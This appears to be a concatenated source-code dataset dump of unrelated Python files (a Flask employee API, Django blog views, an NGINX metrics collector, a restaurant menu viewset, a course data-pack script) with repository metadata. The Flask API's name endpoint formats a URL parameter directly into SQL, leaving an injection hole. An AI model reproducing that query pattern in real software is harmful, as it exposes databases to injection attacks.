for i in iterator:
yield i
except :
raise TooManyFiles
def get_zip_size(source, encode):
archive = ZipFile(encode, 'w')
size = calc_size(source, archive)
archive.close()
return size
def get_zip(source, encode):
archive = ZipFile(encode, 'w')
it = file_wss(source, archive)
archive.close()
return it
def get_zip_it(source, encode):
archive = ZipFile(encode, 'w')
size = calc(source, archive)
it = file_wss(source, archive)
archive.close()
return size, it
if __name__ == "__main__":
main()
| [
"ggjjlldd@gmail.com"
] | ggjjlldd@gmail.com |
10c36922bc03425a1fe36d97c99ee638a1715209 | 651dd30ada6088fc075e93ffd1c5eb019a2e26ad | /setup.py | 43f99b860d29e0b70d171dc7684ab4d945b2a319 | [] | no_license | ashish-hacker/exAPI | d840b0b4da8173eca8121c0a8890cca8915491b6 | 10a18160fe652c10063c8bcda26bcb0f59aa0df3 | refs/heads/main | 2023-02-15T14:09:58.988459 | 2020-12-30T05:27:31 | 2020-12-30T05:27:31 | 325,461,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | from flask import Flask, request
from flask_restful import Resource, Api
from sqlalchemy import create_engine
from json import dumps
from flask_jsonpify import jsonify
db_connect = create_engine('sqlite:///chinook.db')
app = Flask(__name__)
api = Api(app)
class Employees(Resource):
def get(self):
conn = db_connect.connect() # connect to database
query = conn.execute("select * from employees") # This line performs query and returns json result
return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID
class Tracks(Resource):
def get(self):
conn = db_connect.connect()
query = conn.execute("select trackid, name, composer, unitprice from tracks;")
result = {'data': [dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
class Employees_Name(Resource):
def get(self, employee_id):
conn = db_connect.connect()
query = conn.execute("select * from employees where EmployeeId =%d " %int(employee_id))
result = {'data': [dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
class Getname(Resource):
def get(self, name):
conn = db_connect.connect()
query = conn.execute("select * from employees where FirstName = %s"%(name))
result = {'data':[dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
api.add_resource(Employees, '/employees') # Route_1
api.add_resource(Tracks, '/tracks') # Route_2
api.add_resource(Employees_Name, '/employees/<employee_id>') # Route_3
api.add_resource(Getname, '/name/<name>')
if __name__ == '__main__':
app.run(port='5002') | [
"akpanigrahy26@gmail.com"
] | akpanigrahy26@gmail.com |
bd06d2423fa88052243f341f9de42c0b6771158e | e6cee476fe265ebcd3f83d519db3fd01368e14cd | /article/views.py | 7f67517d0395f624c57c399115d9ece9bd814b16 | [] | no_license | edward-yin/blog-project | c96bca8c62141bcfef9dc4d3d500d5f8dcd23ce4 | 55503b060cb808ee0c5c676d53e60ed895712ec9 | refs/heads/master | 2021-01-21T14:23:55.300770 | 2017-07-13T02:58:11 | 2017-07-13T02:58:11 | 95,274,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | from django.shortcuts import render
from django.http import HttpResponse
from article.models import Article
from datetime import datetime
from django.http import Http404
# Create your views here
def home(request):
post_list = Article.objects.all() #获取全部的Article对象
return render(request, 'home.html', {'post_list' : post_list})
def detail(request,arti_id):
try:
post = Article.objects.get(id=str(arti_id))
except Article.DoesNotExist:
raise Http404
return render(request,'post.html',{'post':post})
| [
"edward.yinxp@gmail.com"
] | edward.yinxp@gmail.com |
e00d864ccd59cb04d2832d0d8da60884622e3044 | b2de5660d81afdf6b1fba058faee6ece6a51e462 | /amplify/agent/collectors/plus/upstream.py | ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5 | [
"BSD-2-Clause"
] | permissive | Ferrisbane/nginx-amplify-agent | 725d8a7da7fb66e0b41cddd8139d25a084570592 | ef769934341374d4b6ede5fcf5ebff34f6cba8de | refs/heads/master | 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null | UTF-8 | Python | false | false | 3,982 | py | # -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
| [
"dedm@nginx.com"
] | dedm@nginx.com |
cb8a68f1457ae35fdff34a854bc29bb7e59f0116 | be2efdf72140c50134725ba227016a7727e7c447 | /blog/admin.py | 0da353e28dca24c3f8d1ddff146f7a1ca00c82fe | [] | no_license | slTrust/django_blog | 936e6a55f2d46971a7bdeadb1b83f378cf1fc424 | 509c45ce0fc66b47487ccefdcaa8312593d0c832 | refs/heads/master | 2020-04-07T17:19:16.592269 | 2018-11-21T14:34:50 | 2018-11-21T14:34:50 | 158,564,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from django.contrib import admin
# Register your models here.
# admin的使用方式:
'''
在这里进行注册 就可以在后台页面进行数据录入
'''
from blog import models
admin.site.register(models.UserInfo)
admin.site.register(models.Blog)
admin.site.register(models.Category)
admin.site.register(models.Tag)
admin.site.register(models.Article)
admin.site.register(models.ArticleUpDown)
admin.site.register(models.Article2Tag)
admin.site.register(models.Comment) | [
"trustfor@sina.cn"
] | trustfor@sina.cn |
9b7e9d3d90de74e4bc9953761ad5776d63bdc1db | 99b998a790f8ef3186ca65c63c34434a46fd5a54 | /admin_view/views/menu.py | f8b8a485cc971f5e68ce105a104b4c4268273913 | [] | no_license | jhavive/restaurant_management_server | 2d12eaefc45b4aa530fb55298f8538dfb69a9e8c | 9025a938581e8a45189a5d5429bfd2a33c378edf | refs/heads/master | 2023-05-29T17:19:43.728748 | 2021-06-07T06:22:21 | 2021-06-07T06:22:21 | 374,556,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,101 | py | from rest_framework import viewsets
import json
from rest_framework.response import Response
from admin_view.models import Menu, Section, Items
class MenuViewSet(viewsets.ViewSet):
# def list(self, request):
def list(self, request, pk=None):
try:
menu = {}
sections = []
response = []
try:
menu = Menu.objects.get(hotel=request.user.organization)
sections = Section.objects.filter(menu=menu)
except Exception as e:
print(e)
for section in sections:
section_items = []
items = Items.objects.filter(section=section)
for item in items:
section_items.append({
"id" : item.pk,
"item_name" : item.name,
"description" : item.description,
"price" : item.price,
# "non_veg" : item.non_veg,
"tags" : item.tags,
})
response.append({
"section_name" : section.name,
"items" : section_items
})
return Response(response)
except Exception as e:
print(e)
return Response({
"message": "Somerror occured"
}, status=500)
def create(self, request):
try:
req = json.loads(request.body)
hotel = request.user.organization
menu = Menu.objects.get_or_create(hotel=hotel)
menu = Menu.objects.get(hotel=hotel)
sections = Section.objects.filter(menu=menu).delete()
items = Items.objects.filter(menu=menu).delete()
print(req)
for section in req.get('sections'):
new_section = Section(name=section.get('section_name'), menu=menu)
new_section.save()
for item in section.get('items'):
new_item = Items(
name = item.get('item_name'),
description = item.get('description'),
price = item.get('price'),
menu = menu,
section = new_section,
hotel = hotel
)
new_item.save()
return Response({
"message": "Successfully Created A new Menu",
"status": True
})
except Exception as e:
print(e)
return Response({
"message": 'Some Error Occured',
"status": False
}, status=400)
| [
"jhavive@gmail.com"
] | jhavive@gmail.com |
1e9c528018bf38cf093d4fc468adb1347d55c350 | 88ab730d575f63d5fb7b2479089ae4da0a76d13c | /src/kmeans_nw.py | d427e3b1a15b88ef8a7b8c17f751484ecfa8f76e | [] | no_license | ecnumjc/newwords | a4d04946333f85990e035dcd81e25ee0380f9bd0 | ca62f11c0f7e2051df1232845a6de733e5bac89c | refs/heads/master | 2021-01-10T12:26:58.591180 | 2016-04-18T10:43:12 | 2016-04-18T10:43:12 | 55,706,576 | 1 | 0 | null | null | null | null | GB18030 | Python | false | false | 542 | py | # -*- coding: utf-8 -*-
from sklearn.cluster import KMeans
from sklearn.externals import joblib
import pca
if __name__ == '__main__':
feature,word = pca.loadDataSet('fund.txt')
lowDMat,reconMat = pca.pca(feature,1)
print lowDMat
fout = open('result.txt','w')
#调用kmeans类
clf = KMeans(n_clusters=2)
s = clf.fit(lowDMat)
#print s
#中心
#print clf.cluster_centers_
#每个样本所属的簇
for i in range(len(clf.labels_)):
fout.write(word[i][0]+'\t'+str(clf.labels_[i])+'\n') | [
"593074398@qq.com"
] | 593074398@qq.com |
0efd5a531ecc344c1ecfdd46256d4a409f0fc4d2 | 17bb9da0ca060565ae171eedd0050892b990a48e | /grs/sell_buy_immediately.py | 435e09d407c80336cdb92eeaead9b3b39346bf19 | [] | no_license | showliu/Stock_Bot | b17d5291a698ddc6126336056f8ae20669e1e769 | 6bd01761db1e52cb67d70f8d0226e1b8394a2863 | refs/heads/master | 2020-03-28T16:59:13.606740 | 2018-04-12T13:09:33 | 2018-04-12T13:09:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,190 | py | # -*- coding: utf-8 -*-
"""
功能:抓取個股殖利率程式
網址: http://www.twse.com.tw/ch/trading/exchange/BWIBBU/BWIBBU_d.php
前置作業:需要把csv檔中頭尾相關中文標題先刪除
"""
import csv
def stock_buy_sell_oneday():
'''
回傳dict:[股票名稱, 本益比, 殖利率(%), 股價淨值比]
回傳dict:[台泥utf8, '14.93', '5.69', '1.37']
EX: a['1101'] = [u'\u53f0\u6ce5', '14.93', '5.69', '1.37']
'''
buy_sell_oneday_dict = {}
f = open('TWTB4U_20150424.csv','r')
for row in csv.reader(f):
try:
buy_sell_oneday_dict[row[0].strip()]=[row[1].decode('Big5').strip(),row[2].strip()]
except:
pass
f.close()
return buy_sell_oneday_dict
if __name__ == "__main__":
a = stock_buy_sell_oneday()
print a['9921'][0]
print a['9921'][1] #回傳Y表示暫停現股賣出後現款買進當沖註記
"""
twse_yields = {}
f = open('TWTB4U_20150424.csv','r')
for row in csv.reader(f):
print row
try:
twse_yields[row[0].strip()]=[row[1].decode('Big5').strip(),row[2].strip()]
print type(row[0])
print '123'
except:
pass
f.close()
"""
| [
"hautinboy@yahoo.com.tw"
] | hautinboy@yahoo.com.tw |
52a17c8116ab095f3b0fc1dda5c8b59d0b5e1a86 | af7e80cfe1a8b2f02bac8b5a8e7ab863d662827b | /DataAnalysis/pandass/MultiIndexing/Slice.py | f2d4e60683887eb5ef2796705d45fcdce321456c | [] | no_license | ankiyang/Scripts.Fundamental.Little | 39d19eab13439209353e95df7a28573c80e95797 | 5f03652cad65aa93b2dbb528d5ddbfd889461c25 | refs/heads/master | 2023-01-09T20:14:40.033510 | 2020-11-15T04:20:42 | 2020-11-15T04:20:42 | 60,675,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,013 | py | #!/usr/bin/python3.5
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import itertools
"""Slicing a multi-index with xs
http://stackoverflow.com/questions/12590131/how-to-slice-multindex-columns-in-pandas-dataframes
"""
coords = [('AA','one'),('AA','six'),('BB','one'),('BB','two'),('BB','six')]
index = pd.MultiIndex.from_tuples(coords)
df = pd.DataFrame([11,22,33,44,55], index=index, columns=['MyData'])
print(df)
# MyData
# AA one 11
# six 22
# BB one 33
# two 44
# six 55
#To take the cross section of the 1st level and 1st axis the index:
B_df = df.xs("BB", level=0,axis=0)
print(B_df)
# MyData
# one 33
# two 44
# six 55
# ...and now the 2nd level of the 1st axis.(第二层优先级的索引)
six_df = df.xs("six", level=1, axis=0)
print(six_df)
# MyData
# AA 22
# BB 55
#Slicing a multi-index with xs, method #2
#http://stackoverflow.com/questions/14964493/multiindex-based-indexing-in-pandas
index = list(itertools.product(['Ada', 'Quinn', 'Violet'], ['Comp', 'Math', 'Sci']))
headr = list(itertools.product(['Exams', 'Labs'], ['I', 'II']))
indx = pd.MultiIndex.from_tuples(index, names=['Stuent', 'Course'])
cols = pd.MultiIndex.from_tuples(headr)
data = [[70+x+y+(x*y)%3 for x in range(4)] for y in range(9)]
df = pd.DataFrame(data,index=indx, columns=cols)
print(df)
# Exams Labs
# I II I II
# Stuent Course
# Ada Comp 70 71 72 73
# Math 71 73 75 74
# Sci 72 75 75 75
# Quinn Comp 73 74 75 76
# Math 74 76 78 77
# Sci 75 78 78 78
# Violet Comp 76 77 78 79
# Math 77 79 81 80
# Sci 78 81 81 81
ALL = slice(None)
violet_df = df.loc['Violet']
print(violet_df)
# Exams Lab
# I II I II
# Course
# Comp 76 77 78 79
# Math 77 79 81 80
# Sci 78 81 81 81
math_df = df.loc[(ALL, 'Math'), ALL]
print(math_df)
# Exams Lab
# I II I II
# Stuent Course
# Ada Math 71 73 75 74
# Quinn Math 74 76 78 77
# Violet Math 77 79 81 80
math_2 = df.loc[(slice('Ada', 'Quinn'), 'Math'), ALL]
print(math_2)
# Exams Labs
# I II I II
# Stuent Course
# Ada Math 71 73 75 74
# Quinn Math 74 76 78 77
math_exams = df.loc[(ALL,'Math'),('Exams')]
print(math_exams)
# I II
# Stuent Course
# Ada Math 71 73
# Quinn Math 74 76
# Violet Math 77 79
math_II = df.loc[(ALL, 'Math'), (ALL, 'II')]
print(math_II)
# Exams Labs
# II II
# Stuent Course
# Ada Math 73 74
# Quinn Math 76 77
# Violet Math 79 80
#Setting portions of a multi-index with xs
#http://stackoverflow.com/questions/19319432/pandas-selecting-a-lower-level-in-a-dataframe-to-do-a-ffill
| [
"ankiyang1201@gmail.com"
] | ankiyang1201@gmail.com |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab | d200a54adcec3a254a909b9689f925c1614f6fb1 | /backend/core/admin.py | a526227756b4d1de8a88c8269f99a134351a5779 | [] | no_license | shusaku-ishikawa/binance | 1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19 | 60bad0848fa4f4666e2476117a79ee8452326ed1 | refs/heads/master | 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 | JavaScript | UTF-8 | Python | false | false | 2,304 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin) | [
"ishikawasyuusaku@gmail.com"
] | ishikawasyuusaku@gmail.com |
7978badf89c1cfae0886c4d7231c7369ec2b0e1d | 030445f550d23d6e400e3e944095f816986d6c42 | /travelproject/wsgi.py | 5a330f83a9b6eeec247fac2ecb721d2c1b225db8 | [] | no_license | MidhunBabu01/traveloprj | 9a3536057d0dbca3e2a8e7f2ece3224736fb9dc7 | 49bf31fde7d671a29754ff931ce836a48d6d0c49 | refs/heads/main | 2023-02-12T10:56:40.882787 | 2021-01-13T15:23:37 | 2021-01-13T15:23:37 | 329,349,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for travelproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'travelproject.settings')
application = get_wsgi_application()
| [
"midhunkb57@gmial.com"
] | midhunkb57@gmial.com |
f98579912b57bed424ce066168325bba2c01ae19 | 275ae35cac0b81bf69cc685ded06c5cdac8ca91a | /tcpacceptor.py | 2f352828b4beed3ca19c0991a5bd34d5ae5623bb | [] | no_license | changshoumeng/python_local-network_file-transfer-service | 2988e8de69b80bf5814b350094272601fc8ab04c | 75a9e5d6001967a775038d3e3dd8af86080a9e2b | refs/heads/master | 2021-01-20T19:34:22.569603 | 2016-06-19T04:16:41 | 2016-06-19T04:16:41 | 61,460,910 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,377 | py | # -*- coding: utf-8 -*-
#Give wisdom to the machine,By ChangShouMeng
import sys,os
import Queue,time
import socket,select,errno
from config import *
from common import *
def getNowTime():
t=time.time()
return int(t)
class SocketStatus:
SOCKET_INIT=0
SOCKET_CONNECTING=1
SOCKET_CONNECTED=2
SOCKET_WOULDCLOSE=3
SOCKET_CLOSED=4
###################################################
# TcpAcceptor 接受器,用户包装accept后的连接
# 子类继承TcpAcceptor,可Overrid以下方法:
# unpackFromBuffer 定制解包逻辑
# makeTask 定制把接收数据包装成一个任务的方法,此task存放在接收队列里
###################################################
class TcpAcceptor(object):
def __init__(self,serverType,acceptSocket,acceptAddr,msgQueue=None):
self.serverType=serverType
self.acceptSocket=acceptSocket
self.acceptAddr=acceptAddr
if msgQueue:
self.messageQueue=msgQueue
else:
self.messageQueue=Queue.Queue()
self.socketState=SocketStatus.SOCKET_CONNECTED
self.recvBuffer=""
self.recvBufSize=1024
self.keepliveTime=getNowTime()
self.sessionId=0
def dumpLog(self,info):
logText="[ses{0}{1}] {2}".format(self.sessionId,self.acceptAddr,info)
dump_log(logText)
def setSessionId(self,sessionId):
self.sessionId = sessionId
def getSessionId(self):
return self.sessionId
def disconnect(self,is_release=True):
if not is_release:
self.socketState=SocketStatus.SOCKET_WOULDCLOSE
return
if SocketStatus.SOCKET_CLOSED == self.socketState:
return
self.socketState=SocketStatus.SOCKET_CLOSED
self.acceptSocket.close()
def isConnected(self) :
return self.socketState == SocketStatus.SOCKET_CONNECTED
def sendData(self,data):
if not self.isConnected():
return
self.acceptSocket.send(data)
###################################################
#callback_method onFdRead
###################################################
def onFdRead(self):
while True:
try:
data = self.acceptSocket.recv(self.recvBufSize)
if not data:
self.dumpLog("onFdRead Zero")
self.disconnect(is_release=False)
return
self.recvBuffer += data
readSize=self.onRead(self.recvBuffer)
self.recvBuffer = self.recvBuffer[readSize:]
pass
except socket.error, msg:
if msg.errno == errno.EAGAIN:
#print "TcpConnector onFdRead EAGAIN<linux>"
break
if msg.errno == errno.EWOULDBLOCK:
#print "TcpConnector onFdRead EWOULDBLOCK<windows>"
break
else:
#(ErrorType, ErrorValue, ErrorTB) = sys.exc_info()
#(errno2, err_msg2) = ErrorValue
log="read error,errno:{0}".format(msg.errno )
self.dumpLog(log)
self.disconnect(is_release=False)
return
###################################################
#callback_method onRead
###################################################
def onRead(self,recvBuffer):
total_size=len(recvBuffer)
begin_pos=0
end_pos=total_size
while begin_pos < end_pos:
leftBuffer=recvBuffer[begin_pos:]
unpack_size=self.unpackFromBuffer(leftBuffer)
if unpack_size < 0:
self.dumpLog("unpackFromBuffer error")
self.disconnect()
break
if unpack_size==0:
break
packet=recvBuffer[begin_pos:begin_pos+unpack_size]
self.dispatchPacket(packet)
begin_pos += unpack_size
return begin_pos
###################################################
#child class must override this interface
###################################################
def unpackFromBuffer(self,leftBuffer):
print "unpackFromBuffer:",len(leftBuffer),leftBuffer
return len(leftBuffer)
###################################################
#callback_method dispatchPacket
###################################################
def dispatchPacket(self,packet):
if not self.messageQueue:
self.dumpLog("dispatchPacket,but self.messageQueue is None")
return
#self.dumpLog( "dispatchPacket,curentRecvQeue size:{0}".format( self.messageQueue.qsize() ))
if self.messageQueue.qsize() > 128:
self.dumpLog( "dispatchPacket Error,self.messageQueue.qsize() too big" )
return
task=self.makeTask(packet)
self.messageQueue.put(task)
#print "TcpConnector dispatchPacket:",packet
pass
##child class must override this interface
def makeTask(self,packet):
return packet
| [
"zhangtao@chelun.com"
] | zhangtao@chelun.com |
c2ac11b48b20e62b2945ba7dd35ed3c6fca2d0a5 | 2760d0bc67865a5d637e2cdd42cf882399fcade9 | /program_pack/Program_DataPack_2019_v2.py | 07bc735f84d1721eb4f7bded24606ab620f1e98e | [] | no_license | pjryan356/CoB | 2406c09988d03a769b0a6ca787dc09bf421265cf | 06e258ffa8a3759795a451abca6b02bfe45abd3b | refs/heads/master | 2021-11-30T23:42:46.747759 | 2021-01-14T22:34:00 | 2021-01-14T22:34:00 | 155,631,641 | 0 | 0 | null | 2021-01-14T22:34:02 | 2018-10-31T22:33:23 | HTML | UTF-8 | Python | false | false | 42,097 | py | ## Program CES Data Pack
# Peter Ryan Feb 2019
import base64
import flask
import dash
import pandas as pd
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from collections import OrderedDict
from tabulate import tabulate
from IPython.core.interactiveshell import InteractiveShell
import sys
sys.path.append('c:\\Peter\\GitHub\\CoB\\')
import general.RMIT_colours as rc
from general.sams_helper_functions import (return_sams_engine)
from general.sams_queries import (
qry_program_course_structure
)
from general.postgres_queries import (
qry_course_enhancement_list
)
from general.db_helper_functions import (
connect_to_postgres_db,
db_extract_query_to_dataframe
)
from course_pack.Course_enhancement_graphs import (
line_graph_measure_surveys,
line_graph_gtsq_surveys,
generate_ces_pd_table,
)
from Program_graphs import (
line_graph_crse_prg,
line_graph_prg_crses,
line_graph_crse_prg_enrol,
line_graph_crse_prg_current
)
from course_pack.Course_enhancement_functions import (
get_term_name,
get_course_pop,
get_gts_questions
)
'''
This script is designed to a Program level CES Data Pack.
Get the program structure from the SAMS database
'''
'''------------------------------------- Get Inputs --------------------------------'''
# Set parameter values with input prompts or go with preset values (input prompt)
# Get Program Code
#program_code = input("Program Code: ") ## Input password
program_code_test = [
'MC192',
'BP027',
'BP253',
'BP030',
'BP129',
'BP134',
'BP138',
'BP141',
'BP143',
'BP217',
'BP251',
'BP252',
'BP254',
'BP255',
'BP276',
'BP308',
'BP314',
'BP313',
'BP324',
'MC161',
'MC162',
'MC194',
'MC196',
'MC197',
'MC198',
'MC199',
'MC200',
'MC201',
'MC205',
'MC260',
'MC263',
'MC276',]
#program_code_test = 'BP253'
start_year = 2016
end_year = 2019
semester = 2
# Setup app
app = dash.Dash(__name__)
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
''' ------------------- Add a css file to configure settings and layouts-------------'''
# The main css file used was copied from https://codepen.io/chriddyp/pen/bWLwgP.css
# When used 'directly' it had an undo/redo button located in bottom left corner of every page
# This was 'fixed' by appending the 'remove_undo.css' file
# In order to work the css files had to appended using the methodology outlined at
# https://community.plot.ly/t/how-do-i-use-dash-to-add-local-css/4914/2
## I do not fully understand how this works and sometimes it messes up
# app.css.append_css({"external_url": "https://codepen.io/chriddyp/pen/bWLwgP.css"}) # direct css usage
'''--------------------------------- Connect to Database ----------------------------'''
# create postgres engine this is the connection to the postgres database
postgres_pw = input("Postgres Password: ")
postgres_user = 'pjryan'
postgres_host = 'localhost'
postgres_dbname = 'postgres'
con_string = "host='{0}' " \
"dbname='{1}' " \
"user='{2}' " \
"password='{3}' " \
"".format(postgres_host, postgres_dbname, postgres_user, postgres_pw)
postgres_con, postgres_cur = connect_to_postgres_db(con_string)
'''------------------------Get Images---------------------'''
# header image
image_filename = 'C:\\Peter\\CoB\\logos\\Logo_COBL_transparent_200.png' # replace with your own image
logo = base64.b64encode(open(image_filename, 'rb').read())
# ces scale image (3 explanation)
image_filename = 'C:\\Peter\\CoB\\logos\\CES_scale2.png' # replace with your own image
ces_scale_image = base64.b64encode(open(image_filename, 'rb').read())
'''------------------------------ Helper functions -----------------------------------'''
def list_to_text(obList):
# converts a list of object into a string list for sql IN statement
txt = "("
for ob in obList:
txt += "'{}',".format(ob)
txt = txt[:-1] + ")"
return txt
def get_courses_data(df1, course_list):
# filters dataframe to given course_code
try:
return df1.loc[df1['course_code'].isin(course_list)]
except:
pass
return None
def get_program_data(df1, code, plan=None):
# filters dataframe to given course_code
try:
return df1.loc[df1['program_code'] == code]
except:
pass
return None
'''----------------------------- create data extraction functions -------------------------------------'''
def get_course_enhancement_list(year, semester, cur, schema='course_enhancement'):
# Returns a dataframe of the courses undergoing enhancement course in year, semester from db (cur)
qry = qry_course_enhancement_list(year, semester, 'vw100_courses', schema)
return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_course_ces_data(course_list, start_year, end_year, cur, tbl='vw1_course_summaries_fixed', schema='ces'):
# Returns a dataframe with CES data for courses in course list
qry = ' SELECT \n' \
" year, semester, level, \n" \
" course_code, \n" \
" course_code_ces, \n" \
' reliability, round(gts, 1) AS gts, round(gts_mean, 1) AS gts_mean, \n' \
' round(osi, 1) AS osi, round(osi_mean, 1) AS osi_mean, \n' \
' round(gts1, 1) AS gts1, round(gts2, 1) AS gts2, round(gts3, 1) AS gts3, \n' \
' round(gts4, 1) AS gts4, round(gts5, 1) AS gts5, round(gts6, 1) AS gts6, \n' \
' course_coordinator, population, osi_count, gts_count \n' \
' FROM {0}.{1} \n' \
" WHERE course_code IN {2} \n" \
" AND year >= {3} \n" \
" AND year <= {4} \n" \
" ORDER BY course_code, year, semester; \n" \
"".format(schema, tbl,
list_to_text(course_list),
start_year,
end_year)
return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_course_program_ces_data(course_list, program_list, start_year, end_year, cur, tbl='vw115_course_program', schema='ces'):
# Returns a dataframe with CES data for courses in course list
qry = ' SELECT \n' \
' crse_prg.*, \n' \
' pd.program_name, \n' \
" CASE WHEN pd.college = 'BUS' THEN pd.school_code ELSE 'Not CoB' END AS school_code, \n" \
" COALESCE(bsd.school_name_short, 'Not CoB') AS school_name_short, \n" \
" CASE WHEN pd.college = 'BUS' THEN bsd.html ELSE '#FAC800' END AS school_colour, \n" \
" pd.college, \n" \
" col.college_name_short, \n" \
" col.html AS college_colour \n " \
' FROM ( \n' \
' SELECT \n' \
" year, semester, level, \n" \
" course_code, course_code_ces, program_code, \n" \
' reliability, \n' \
' round(gts, 1) AS gts, round(gts_mean, 1) AS gts_mean, \n' \
' round(osi, 1) AS osi, round(osi_mean, 1) AS osi_mean, \n' \
' round(gts1, 1) AS gts1, round(gts2, 1) AS gts2, round(gts3, 1) AS gts3, \n' \
' round(gts4, 1) AS gts4, round(gts5, 1) AS gts5, round(gts6, 1) AS gts6, \n' \
' population::int, osi_count, gts_count \n' \
' FROM {0}.{1} \n' \
" WHERE course_code IN {2} \n" \
" AND year >= {3} \n" \
" AND year <= {4} \n" \
